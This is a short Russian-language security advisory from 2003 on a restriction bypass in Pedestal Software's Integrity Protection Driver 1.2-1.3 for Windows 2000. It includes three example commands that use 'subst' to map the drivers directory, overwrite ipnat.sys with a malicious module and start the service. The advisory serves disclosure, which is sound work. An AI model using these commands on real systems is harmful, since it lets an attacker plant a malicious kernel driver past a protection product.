Обход ограничений в Integrity Protection Driver

Дата публикации:
07.01.2003
Всего просмотров:
635
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная
Воздействие:
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Integrity Protection Driver 1.x
Описание: Pedestal Software Integrity Protection Driver – драйвер для Windows 2000, который защищает систему от установки новых сервисов и драйверов, а также защищает существующие драйвера.

Создавая символьную ссылку к каталогу драйверов Windows, нападающий может обойти IPD и перезаписать любой драйвер злонамеренным файлом. Пример:

$ subst x: c:\winnt\system32\drivers
$ copy badmodule.sys x:\ipnat.sys
$ net start ipnat
Уязвимость обнаружена в Pedestal Software Integrity Protection Driver 1.2-1.3

Ссылки: Another way to bypass Integrity Protection Driver ('subst' vuln)
или введите имя

CAPTCHA